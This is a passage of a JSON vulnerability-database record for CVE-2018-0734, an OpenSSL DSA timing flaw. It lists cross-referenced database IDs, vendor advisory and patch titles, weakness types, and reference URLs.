"PACKETSTORM", "id": "155414", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201810-1435", "trust": 0.7 }, { "db": "AUSCERT", "id": "ESB-2019.0660", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2019.0960", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2019.0481", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2019.0514", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2019.3390.4", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2020.4251", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2019.4403", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2019.0644.2", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2020.0491", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2022.0696", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2019.4479.2", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2019.4753", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2019.4479", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2020.0102", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2020.0529", "trust": 0.6 }, { "db": "PACKETSTORM", "id": "150683", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "155160", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "155417", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "150437", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "153932", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "155416", "trust": 0.1 }, { "db": "VULHUB", "id": "VHN-118936", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2018-0734", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "150561", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "169667", "trust": 0.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-118936" }, { "db": "VULMON", "id": "CVE-2018-0734" }, { "db": "PACKETSTORM", "id": "150437" }, { "db": "PACKETSTORM", "id": "155414" }, { "db": "PACKETSTORM", "id": "155417" }, { "db": "PACKETSTORM", "id": "150561" }, { "db": "PACKETSTORM", "id": "155160" }, { "db": "PACKETSTORM", "id": "150683" }, { "db": "PACKETSTORM", "id": "169667" }, { "db": "CNNVD", "id": "CNNVD-201810-1435" }, { "db": "NVD", "id": "CVE-2018-0734" } ] }, "id": "VAR-201810-0932", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VULHUB", "id": "VHN-118936" } ], "trust": 0.01 }, "last_update_date": "2024-07-23T21:55:35.727000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "OpenSSL Security vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=86419" }, { "title": "Red Hat: Moderate: openssl security and bug fix update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20192304 - security advisory" }, { "title": "Red Hat: Low: openssl security, bug fix, and enhancement update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20193700 - security advisory" }, { "title": "Amazon Linux AMI: ALAS-2019-1153", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2019-1153" }, { "title": "Ubuntu Security Notice: openssl, openssl1.0 vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3840-1" }, { "title": "Amazon Linux 2: ALAS2-2019-1153", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2-2019-1153" }, { "title": "Red Hat: CVE-2018-0734", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2018-0734" }, { "title": "Arch Linux Issues: ", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=cve-2018-0734" }, { "title": "Debian Security Advisories: DSA-4355-1 openssl1.0 -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=7cc6b04edacd67d6e5bf27bd36f54217" }, { "title": "Amazon Linux 2: ALAS2-2019-1362", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2-2019-1362" }, { "title": "Arch Linux Advisories: [ASA-201812-7] lib32-openssl-1.0: private key recovery", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-201812-7" }, { "title": "Arch Linux Advisories: [ASA-201812-6] lib32-openssl: private key recovery", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-201812-6" }, { "title": "Arch Linux Advisories: [ASA-201812-5] openssl: private key recovery", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-201812-5" }, { "title": "Arch Linux Advisories: [ASA-201812-8] openssl-1.0: private key recovery", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-201812-8" }, { "title": "Red Hat: Important: Red Hat JBoss Core Services Apache HTTP Server 2.4.37 Security Release", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20193935 - security advisory" }, { "title": "Red Hat: Important: Red Hat JBoss Core Services Apache HTTP Server 2.4.37 Security Release on RHEL 6", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20193932 - security advisory" }, { "title": "Red Hat: Important: Red Hat JBoss Core Services Apache HTTP Server 2.4.37 Security Release on RHEL 7", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20193933 - security advisory" }, { "title": "Debian Security Advisories: DSA-4348-1 openssl -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=322bd50b7b929759e38c99b73122a852" }, { "title": "IBM: IBM Security Bulletin: IBM NeXtScale Fan Power Controller (FPC) is affected by vulnerability in OpenSSL (CVE-2018-0734)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=089729287496a632fa4c42658b60b635" }, { "title": "IBM: IBM Security Bulletin: IBM MQ Appliance is affected by an OpenSSL vulnerability (CVE-2018-0734)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=3b0880c0fe7c1c2995382c68ba0fd928" }, { "title": "IBM: IBM Security Bulletin: OpenSSL DSA signature algorithm security vulnerability affects IBM Spectrum Control (formerly Tivoli Storage Productivity Center) (CVE-2018-0734)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=bf4a61aab0614bc21bae17e61513abdc" }, { "title": "IBM: IBM Security Bulletin: A security vulnerability has been identified in OpenSSL, which is shipped with IBM Tivoli Network Manager IP Edition (CVE-2018-0734)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=9f92a5713223095107b36bb14efd3013" }, { "title": "IBM: IBM Security Bulletin: Multiple vulnerabilities in OpenSSL affect IBM Rational ClearQuest (CVE-2018-0734, CVE-2018-5407)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=c36f1dd66164e22918d817553be91620" }, { "title": "IBM: IBM Security Bulletin: Multiple Vulnerabilities in OpenSSL affect IBM Worklight and IBM MobileFirst Platform Foundation", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=1b873a45dce8bb56ff011908a9402b67" }, { "title": "IBM: IBM Security Bulletin: IBM QRadar Network Security is affected by openssl vulnerabilities (CVE-2019-1559, CVE-2018-0734)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=7ceb7cf440b088f91358d1c597d5a414" }, { "title": "IBM: IBM Security Bulletin: IBM Cloud Manager with OpenStack is affected by a OpenSSL vulnerabilities (CVE-2018-0734)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=bcd3c8de23a34fb577cecdb0096912bf" }, { "title": "IBM: IBM Security Bulletin: OpenSSL vunerability", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=f89f8f6307af3f9e5b1f4d0ffb1a9677" }, { "title": "IBM: IBM Security Bulletin: IBM Security Proventia Network Active Bypass is affected by openssl vulnerabilities (CVE-2018-0734)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=4f65fc12e5864fd96d0965bd485769d5" }, { "title": "IBM: IBM Security Bulletin: IBM RackSwitch firmware products are affected by vulnerability in OpenSSL (CVE-2018-0734)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=96f2e72442af5a4308e4a45305db78b4" }, { "title": "IBM: IBM Security Bulletin: Multiple Security Vulnerabilities in OpenSSL Affect IBM Sterling B2B Integrator (CVE-2018-0734, CVE-2018-5407)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=e4ca493bfda92c5355c98328872a84e5" }, { "title": "IBM: IBM Security Bulletin: IBM Event Streams is affected by OpenSSL vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=efdce9b94f89918f3f2b2dfc69780ccd" }, { "title": "IBM: IBM Security Bulletin: Multiple vulnerabilities in OpenSSL affect IBM Rational ClearCase (CVE-2018-0734, CVE-2018-5407)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=ddeebd7237369bd2318e4087834121a5" }, { "title": "Tenable Security Advisories: [R1] Nessus 8.1.1 Fixes Multiple Third-party Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2018-16" }, { "title": "IBM: IBM Security Bulletin: Vulnerability affects Watson Explorer Foundational Components (CVE-2018-0732, CVE-2018-0734, CVE-2018-0737)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=4f5f12bea67642140a5af636a3850c79" }, { "title": "IBM: IBM Security Bulletin: Security vulnerabilities identified in OpenSSL affect Rational Build Forge (CVE-2018-0734, CVE-2018-5407 and CVE-2019-1559)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=e59d7f075c856823d6f7370dea35e662" }, { "title": "IBM: IBM Security Bulletin: Vulnerabilities in GNU OpenSSL (1.0.2 series) affect IBM Netezza Analytics", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=ac5ccbde4e4ddbcabd10cacf82487a11" }, { "title": "IBM: IBM Security Bulletin: Multiple vulnerabilities in OpenSSL affect IBM Sterling Connect:Express for UNIX (CVE-2018-0734 and CVE-2018-5407)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=fda6d001f041b9b0a29d906059d798b4" }, { "title": "IBM: IBM Security Bulletin: IBM DataPower Gateway is affected by vulnerabilities in OpenSSL", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=c7313d7a6ba5364a603c214269588feb" }, { "title": "IBM: Security Bulletin: Vulnerabities in SSL in IBM DataPower Gateway", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=5fc1433ca504461e3bbb1d30e408592c" }, { "title": "IBM: IBM Security Bulletin: IBM InfoSphere Master Data Management Standard and Advanced Editions are affected by vulnerabilities in OpenSSL (CVE-2018-0735, CVE-2018-0734, CVE-2018-5407)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=c829d56f5888779e791387897875c4b4" }, { "title": "IBM: IBM Security Bulletin: Vulnerability affects Watson Explorer Foundational Components (CVE-2018-0732, CVE-2018-0734, CVE-2018-0737)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=35f40c202a57607f29c0bb486da6ea8a" }, { "title": "Tenable Security Advisories: [R1] Nessus 7.1.4 Fixes Multiple Third-party Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2018-17" }, { "title": "IBM: IBM Security Bulletin: Vulnerabilities in OpenSSL affect GCM16 \u0026 GCM32 KVM Switch Firmware (CVE-2018-0734, CVE-2018-0737, CVE-2018-0739)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=d3d3f316d14423d9850192f1d5f20a1b" }, { "title": "IBM: IBM Security Bulletin: Multiple vulnerabilities in OpenSSL affect IBM InfoSphere Information Server", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=d04b79d120c8d1de061ffc3f57258fcb" }, { "title": "IBM: IBM Security Bulletin:IBM Security Identity Adapters has released a fix in response to the OpenSSL vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=00b8bc7d11e5484e8721f3f62ec2ce87" }, { "title": "IBM: Security Bulletin: Vulnerabilities have been identified in OpenSSL and the Kernel shipped with the DS8000 Hardware Management Console (HMC)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=423d1da688755122eb2591196e4cc160" }, { "title": "Debian CVElist Bug Report Logs: mysql-5.7: Security fixes from the January 2019 CPU", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=996600102cb3180bfad1fcc5c68a4d77" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - April 2019", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=4ee609eeae78bbbd0d0c827f33a7f87f" }, { "title": "IBM: IBM Security Bulletin: Multiple Security Vulnerabilities affect IBM\u00ae Cloud Private \u2013 Node.js", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=2e571e7bc5566212c3e69e37ecfa5ad4" }, { "title": "IBM: IBM Security Bulletin: Multiple vulnerabilities in Node.js affect IBM Rational Application Developer for WebSphere Software", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=2bd72b857f21f300d83d07a791be44cf" }, { "title": "Forcepoint Security Advisories: CVE-2018-0734 and CVE-2019-1559 (OpenSSL)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=forcepoint_security_advisories\u0026qid=b508c983da563a8786bf80c360afb887" }, { "title": "IBM: IBM Security Bulletin: Multiple vulnerabilities affect IBM\u00ae SDK for Node.js\u2122 in IBM Cloud", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=26f585287da19915b94b6cae2d1b864f" }, { "title": "IBM: IBM Security Bulletin: Multiple vulnerabilities in Node.js affect IBM Cloud App Management V2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=dce787e9d669a768893a91801bf5eea4" }, { "title": "IBM: IBM Security Bulletin: Multiple Security Vulnerabilities have been addressed in IBM Security Access Manager Appliance", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=800337bc69aa7ad92ac88a2adcc7d426" }, { "title": "IBM: IBM Security Bulletin: Multiple Security Vulnerabilities affect IBM\u00ae Cloud Private \u2013 fluentd", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=60de0933c28b353f38df30120aa2a908" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - January 2019", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=f655264a6935505d167bbf45f409a57b" }, { "title": "IBM: IBM Security Bulletin: Vyatta 5600 vRouter Software Patches \u2013 Releases 1801-w and 1801-y", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=bf3f2299a8658b7cd3984c40e7060666" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - January 2019", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=aea3fcafd82c179d3a5dfa015e920864" }, { "title": "IBM: IBM Security Bulletin: Vyatta 5600 vRouter Software Patches \u2013 Release 1801-v", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=413b5f9466c1ebf3ab090a45e189b43e" }, { "title": "IBM: IBM Security Bulletin: IBM API Connect has addressed multiple vulnerabilities in Developer Portal\u2019s dependencies \u2013 Cumulative list from June 28, 2018 to December 13, 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=43da2cd72c1e378d8d94ecec029fcc61" }, { "title": "", "trust": 0.1, "url": "https://github.com/live-hack-cve/cve-2018-0734 " }, { "title": "", "trust": 0.1, "url": "https://github.com/qi-zhan/ps3 " }, { "title": "vyger", "trust": 0.1, "url": "https://github.com/mrodden/vyger " }, { "title": "", "trust": 0.1, "url": "https://github.com/vincent-deng/veracode-container-security-finding-parser " } ], "sources": [ { "db": "VULMON", "id": "CVE-2018-0734" }, { "db": "CNNVD", "id": "CNNVD-201810-1435" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-327", "trust": 1.1 }, { "problemtype": "CWE-320", "trust": 0.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-118936" }, { "db": "NVD", "id": "CVE-2018-0734" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.1, "url": "http://www.securityfocus.com/bid/105758" }, { "trust": 2.5, "url": "https://access.redhat.com/errata/rhsa-2019:3932" }, { "trust": 2.5, "url": "https://access.redhat.com/errata/rhsa-2019:3935" }, { "trust": 2.4, "url": "https://access.redhat.com/errata/rhsa-2019:3933" }, { "trust": 1.9, "url": "https://www.openssl.org/news/secadv/20181030.txt" }, { "trust": 1.9, "url": "https://access.redhat.com/errata/rhsa-2019:2304" }, { "trust": 1.9, "url": "https://access.redhat.com/errata/rhsa-2019:3700" }, { "trust": 1.9, "url": "https://usn.ubuntu.com/3840-1/" }, { "trust": 1.8, "url": "https://nodejs.org/en/blog/vulnerability/november-2018-security-releases/" }, { "trust": 1.8, "url": "https://security.netapp.com/advisory/ntap-20181105-0002/" }, { "trust": 1.8, "url": "https://security.netapp.com/advisory/ntap-20190118-0002/" }, { "trust": 1.8, "url": "https://security.netapp.com/advisory/ntap-20190423-0002/" }, { "trust": 1.8, "url": "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html" }, { "trust": 1.8, "url": "https://www.tenable.com/security/tns-2018-16" }, { "trust": 1.8, "url": "https://www.tenable.com/security/tns-2018-17" }, { "trust": 1.8, "url": "https://www.debian.org/security/2018/dsa-4348" }, { "trust": 1.8, "url": "https://www.debian.org/security/2018/dsa-4355" }, { "trust": 1.8, "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "trust": 1.8, "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "trust": 1.8, "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html" }, { "trust": 1.8, "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "trust": 1.8, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00030.html" }, { "trust": 1.8, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00056.html" }, { "trust": 1.1, "url": "https://git.openssl.org/gitweb/?p=openssl.git%3ba=commitdiff%3bh=8abfe72e8c1de1b95f50aa0d9134803b4d00070f" }, { "trust": 1.1, "url": "https://git.openssl.org/gitweb/?p=openssl.git%3ba=commitdiff%3bh=ef11e19d1365eea2b1851e6f540a0bf365d303e7" }, { "trust": 1.1, "url": "https://git.openssl.org/gitweb/?p=openssl.git%3ba=commitdiff%3bh=43e6a58d4991a451daf4891ff05a48735df871ac" }, { "trust": 1.1, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ewc42uxl5ghtu5g77vkbf6jyuungshom/" }, { "trust": 1.1, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/zbev5qgdrfuzdmnecfxusn5fmyozde4v/" }, { "trust": 1.1, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/y3ivfgserazlnjck35tem2r4726xih3z/" }, { "trust": 0.7, "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=43e6a58d4991a451daf4891ff05a48735df871ac" }, { "trust": 0.7, "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8abfe72e8c1de1b95f50aa0d9134803b4d00070f" }, { "trust": 0.7, "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=ef11e19d1365eea2b1851e6f540a0bf365d303e7" }, { "trust": 0.7, "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/zbev5qgdrfuzdmnecfxusn5fmyozde4v/" }, { "trust": 0.7, "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/y3ivfgserazlnjck35tem2r4726xih3z/" }, { "trust": 0.7, "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ewc42uxl5ghtu5g77vkbf6jyuungshom/" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-0734" }, { "trust": 0.6, "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory29.asc" }, { "trust": 0.6, "url": "https://www.oracle.com/technetwork/topics/security/bulletinjan2019-5251593.html" }, { "trust": 0.6, "url": "https://www.oracle.com/technetwork/topics/security/bulletinapr2019-5462008.html" }, { "trust": 0.6, "url": "https://www.openssl.org/news/vulnerabilities.html" }, { "trust": 0.6, "url": "https://www.openssl.org/news/openssl-1.0.2-notes.html" }, { "trust": 0.6, "url": "http://openssl.org/" }, { "trust": 0.6, "url": "https://www.openssl.org/news/cl102.txt" }, { "trust": 0.6, "url": "https://github.com/openssl/openssl/commit/ef11e19d1365eea2b1851e6f540a0bf365d303e7" }, { "trust": 0.6, "url": "https://github.com/openssl/openssl/commit/8abfe72e8c1de1b95f50aa0d9134803b4d00070f" }, { "trust": 0.6, "url": "https://github.com/openssl/openssl/commit/43e6a58d4991a451daf4891ff05a48735df871ac" }, { "trust": 0.6, "url": "https://support.symantec.com/us/en/article.symsa1490.html" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/1284802" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/1115655" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/1115643" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/1170328" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/1170340" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/1170334" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/1170322" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/1170352" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/1170346" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/1116357" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/1142626" }, { "trust": 0.6, "url": "http://www.ibm.com/support/docview.wss" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/1115649" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/76338" }, { "trust": 0.6, "url": "https://www-01.ibm.com/support/docview.wss?uid=ibm10875298" }, { "trust": 0.6, "url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-openssl-affect-ibm-tivoli-netcool-system-service-monitors-application-service-monitors-cve-2018-5407cve-2020-1967cve-2018-0734cve-2019-1563cve-2019/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/76414" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2019.4403/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2019.4479/" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/1138588" }, { "trust": 0.6, "url": "https://www.oracle.com/security-alerts/cpujan2020verbose.html" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/3517185" }, { "trust": 0.6, "url": "https://www-01.ibm.com/support/docview.wss?uid=ibm10870936" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/1167202" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/77674" }, { "trust": 0.6, "url": "https://www.ibm.com/blogs/psirt/security-bulletin-openssl-as-used-in-ibm-qradar-siem-is-vulnerable-to-a-timing-side-channel-attack-cve-2018-0734/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2020.0491/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2019.3390.4/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2019.4479.2/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/75658" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2020.4251/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2022.0696" }, { "trust": 0.6, "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-have-been-identified-in-openssl-and-the-kernel-shipped-with-the-ds8000-hardware-management-console-hmc/" }, { "trust": 0.6, "url": "https://packetstormsecurity.com/files/155414/red-hat-security-advisory-2019-3935-01.html" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2020.0529/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2019.4753/" }, { "trust": 0.6, "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-openssl-affects-ibm-integrated-analytics-system-2/" }, { "trust": 0.6, "url": "http://www.ibm.com/support/docview.wss?uid=ibm10794861" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2020.0102/" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/1143442" }, { "trust": 0.6, "url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-openssl-affect-ibm-spectrum-protect-plus-cve-2018-0735-cve-2018-0734-cve-2018-5407/" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/1169938" }, { "trust": 0.6, "url": "https://www-01.ibm.com/support/docview.wss?uid=ibm10873310" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/75802" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-5407" }, { "trust": 0.3, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.3, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-0737" }, { "trust": 0.3, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.3, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2018-0734" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-0735" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-9513" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2019-9511" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-9517" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-0197" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-17199" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-9511" }, { "trust": 0.2, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-17189" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2019-9517" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2018-0737" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2018-17199" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2019-9516" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2019-9513" }, { "trust": 0.2, "url": 